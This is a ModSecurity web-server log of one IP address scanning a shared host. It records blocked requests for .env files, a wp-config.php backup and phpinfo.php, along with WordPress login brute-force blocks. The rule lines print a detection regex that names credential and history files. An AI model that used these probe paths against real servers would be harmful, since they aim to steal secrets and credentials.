[Tue May 26 14:49:37.374689 2026] [security2:error] [pid 648203:tid 648363] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqbEQDDtxJNiDrdTpnQAAo0U"]
[Tue May 26 14:49:37.378205 2026] [security2:error] [pid 648203:tid 648363] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqLEQDDtxJNiDrdTpmQAAo0A"]
[Tue May 26 14:49:37.474284 2026] [security2:error] [pid 648203:tid 648314] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.leakyleaks.moes-art.com"] [uri "/api/phpinfo.php"] [unique_id "ahVlqbEQDDtxJNiDrdTpqAAA9m4"]
[Tue May 26 14:49:37.491686 2026] [security2:error] [pid 648203:tid 648370] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlqbEQDDtxJNiDrdTpnAAAAKo"]
[Tue May 26 14:49:37.517821 2026] [security2:error] [pid 648203:tid 648302] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/apis/.env"] [unique_id "ahVlqbEQDDtxJNiDrdTpwgAA9mI"]
[Tue May 26 14:49:37.544474 2026] [security2:error] [pid 648203:tid 648446] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqbEQDDtxJNiDrdTpqQAA9m4"]
[Tue May 26 14:49:37.560633 2026] [security2:error] [pid 648203:tid 648392] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqbEQDDtxJNiDrdTptQAAAMA"]
[Tue May 26 14:49:37.561551 2026] [security2:error] [pid 648203:tid 648437] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqbEQDDtxJNiDrdTpugAAAO0"]
[Tue May 26 14:49:37.562515 2026] [security2:error] [pid 648203:tid 648346] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqbEQDDtxJNiDrdTptwAAAJI"]
[Tue May 26 14:49:37.563209 2026] [security2:error] [pid 648203:tid 648349] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqbEQDDtxJNiDrdTpuQAAAJU"]
[Tue May 26 14:49:37.571067 2026] [security2:error] [pid 648203:tid 648385] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqbEQDDtxJNiDrdTpuAAAALk"]
[Tue May 26 14:49:37.580572 2026] [security2:error] [pid 648203:tid 648446] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqbEQDDtxJNiDrdTpxQAA9mI"]
[Tue May 26 14:49:37.583243 2026] [security2:error] [pid 648203:tid 648412] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqbEQDDtxJNiDrdTpwAAAANQ"]
[Tue May 26 14:49:37.585196 2026] [security2:error] [pid 648203:tid 648357] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqbEQDDtxJNiDrdTpvAAAAJ0"]
[Tue May 26 14:49:37.586423 2026] [security2:error] [pid 648203:tid 648429] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqbEQDDtxJNiDrdTpxAAAAOU"]
[Tue May 26 14:49:37.588271 2026] [security2:error] [pid 648203:tid 648446] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqbEQDDtxJNiDrdTpwwAA9lQ"]
[Tue May 26 14:49:37.591228 2026] [security2:error] [pid 648203:tid 648452] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqbEQDDtxJNiDrdTpxwAAAPw"]
[Tue May 26 14:49:37.665849 2026] [security2:error] [pid 648203:tid 648325] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/app/.env"] [unique_id "ahVlqbEQDDtxJNiDrdTp1QAA4nk"]
[Tue May 26 14:49:37.702827 2026] [security2:error] [pid 648203:tid 648378] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqbEQDDtxJNiDrdTp0QAAALI"]
[Tue May 26 14:49:37.704669 2026] [security2:error] [pid 648203:tid 648424] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqbEQDDtxJNiDrdTp0AAAAOA"]
[Tue May 26 14:49:37.719962 2026] [security2:error] [pid 648203:tid 648436] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqbEQDDtxJNiDrdTp1AAAAOw"]
[Tue May 26 14:49:37.748224 2026] [security2:error] [pid 648203:tid 648274] [remote 216.185.214.209:55266] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.214.185.216.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahVlqbEQDDtxJNiDrdTpyAAAxkY"]
[Tue May 26 14:49:37.821038 2026] [security2:error] [pid 648203:tid 648354] [client 45.148.10.5:11906] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.landsonlogistics.com.onesoft.in"] [uri "/wp-config.php.bak"] [unique_id "ahVlqbEQDDtxJNiDrdTqAAAAAJo"]
[Tue May 26 14:49:38.332298 2026] [security2:error] [pid 648203:tid 648448] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqbEQDDtxJNiDrdTp-wAAAPg"]
[Tue May 26 14:49:38.335200 2026] [security2:error] [pid 648203:tid 648365] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqbEQDDtxJNiDrdTp6wAAAKU"]
[Tue May 26 14:49:38.337184 2026] [security2:error] [pid 648203:tid 648426] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqbEQDDtxJNiDrdTp8wAA4mg"]
[Tue May 26 14:49:38.338216 2026] [security2:error] [pid 648203:tid 648445] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqbEQDDtxJNiDrdTp5QAAAPU"]
[Tue May 26 14:49:38.338928 2026] [security2:error] [pid 648203:tid 648449] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqbEQDDtxJNiDrdTp7gAAAPk"]
[Tue May 26 14:49:38.339006 2026] [security2:error] [pid 648203:tid 648399] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqbEQDDtxJNiDrdTp9QAAAMc"]
[Tue May 26 14:49:38.345004 2026] [security2:error] [pid 648203:tid 648440] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqbEQDDtxJNiDrdTp2wAAAPA"]
[Tue May 26 14:49:38.347415 2026] [security2:error] [pid 648203:tid 648362] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqbEQDDtxJNiDrdTp5wAAAKI"]
[Tue May 26 14:49:38.348278 2026] [security2:error] [pid 648203:tid 648439] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqbEQDDtxJNiDrdTp6AAAAO8"]
[Tue May 26 14:49:38.348337 2026] [security2:error] [pid 648203:tid 648426] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqbEQDDtxJNiDrdTqBQAA4i0"]
[Tue May 26 14:49:38.349300 2026] [security2:error] [pid 648203:tid 648391] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqbEQDDtxJNiDrdTp5gAAAL8"]
[Tue May 26 14:49:38.352325 2026] [security2:error] [pid 648203:tid 648426] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqbEQDDtxJNiDrdTqBgAA4nY"]
[Tue May 26 14:49:38.356466 2026] [security2:error] [pid 648203:tid 648367] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqbEQDDtxJNiDrdTp_AAAAKc"]
[Tue May 26 14:49:38.361821 2026] [security2:error] [pid 648203:tid 648435] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqbEQDDtxJNiDrdTqCQAAAOs"]
[Tue May 26 14:49:38.374829 2026] [security2:error] [pid 648203:tid 648421] [client 216.26.237.36:19411] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlqbEQDDtxJNiDrdTpngAAAN0"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:49:38.377952 2026] [security2:error] [pid 648203:tid 648360] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqbEQDDtxJNiDrdTp-QAAAKA"]
[Tue May 26 14:49:38.380064 2026] [security2:error] [pid 648203:tid 648342] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqbEQDDtxJNiDrdTqAQAAAI4"]
[Tue May 26 14:49:38.488141 2026] [security2:error] [pid 648203:tid 648309] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/apps/.env"] [unique_id "ahVlqrEQDDtxJNiDrdTqIgAAtGk"]
[Tue May 26 14:49:38.488658 2026] [security2:error] [pid 648203:tid 648315] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/application/.env"] [unique_id "ahVlqrEQDDtxJNiDrdTqIQAAtG8"]
[Tue May 26 14:49:38.550355 2026] [security2:error] [pid 648203:tid 648380] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqrEQDDtxJNiDrdTqHwAAtGw"]
[Tue May 26 14:49:38.561196 2026] [security2:error] [pid 648203:tid 648380] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqrEQDDtxJNiDrdTqJgAAtHQ"]
[Tue May 26 14:49:38.561457 2026] [security2:error] [pid 648203:tid 648380] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqrEQDDtxJNiDrdTqKAAAtAc"]
[Tue May 26 14:49:38.566834 2026] [security2:error] [pid 648203:tid 648380] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqrEQDDtxJNiDrdTqJwAAtFc"]
[Tue May 26 14:49:38.567047 2026] [security2:error] [pid 648203:tid 648380] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqrEQDDtxJNiDrdTqKQAAtAs"]
[Tue May 26 14:49:38.570922 2026] [security2:error] [pid 648203:tid 648372] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqrEQDDtxJNiDrdTqKwAAAKw"]
[Tue May 26 14:49:38.570994 2026] [security2:error] [pid 648203:tid 648380] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqrEQDDtxJNiDrdTqIwAAtGU"]
[Tue May 26 14:49:38.581343 2026] [security2:error] [pid 648203:tid 648380] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqrEQDDtxJNiDrdTqKgAAtHI"]
[Tue May 26 14:49:38.582949 2026] [security2:error] [pid 648203:tid 648354] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqrEQDDtxJNiDrdTqNAAAAJo"]
[Tue May 26 14:49:38.584011 2026] [security2:error] [pid 648203:tid 648380] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqrEQDDtxJNiDrdTqJQAAtH4"]
[Tue May 26 14:49:38.587911 2026] [security2:error] [pid 648203:tid 648352] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqrEQDDtxJNiDrdTqLAAAAJg"]
[Tue May 26 14:49:38.594078 2026] [security2:error] [pid 648203:tid 648432] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqrEQDDtxJNiDrdTqNQAAAOg"]
[Tue May 26 14:49:39.278900 2026] [security2:error] [pid 648203:tid 648374] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqrEQDDtxJNiDrdTqRAAAAK4"]
[Tue May 26 14:49:39.279746 2026] [security2:error] [pid 648203:tid 648407] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqrEQDDtxJNiDrdTqQgAAAM8"]
[Tue May 26 14:49:39.281903 2026] [security2:error] [pid 648203:tid 648222] [remote 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqrEQDDtxJNiDrdTqQQAAkhI"]
[Tue May 26 14:49:39.299076 2026] [security2:error] [pid 648203:tid 648336] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqrEQDDtxJNiDrdTqRgAAAIg"]
[Tue May 26 14:49:39.333928 2026] [security2:error] [pid 648203:tid 648346] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqrEQDDtxJNiDrdTqSAAAkng"]
[Tue May 26 14:49:39.342889 2026] [security2:error] [pid 648203:tid 648346] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqrEQDDtxJNiDrdTqRwAAkho"]
[Tue May 26 14:49:39.343303 2026] [security2:error] [pid 648203:tid 648416] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqrEQDDtxJNiDrdTqYwAAANg"]
[Tue May 26 14:49:39.343812 2026] [security2:error] [pid 648203:tid 648357] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqrEQDDtxJNiDrdTqVgAAAJ0"]
[Tue May 26 14:49:39.344091 2026] [security2:error] [pid 648203:tid 648415] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqrEQDDtxJNiDrdTqZAAAANc"]
[Tue May 26 14:49:39.347541 2026] [security2:error] [pid 648203:tid 648412] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqrEQDDtxJNiDrdTqVAAAANQ"]
[Tue May 26 14:49:39.350152 2026] [security2:error] [pid 648203:tid 648447] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqrEQDDtxJNiDrdTqUAAAAPc"]
[Tue May 26 14:49:39.350254 2026] [security2:error] [pid 648203:tid 648403] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqrEQDDtxJNiDrdTqVQAAAMs"]
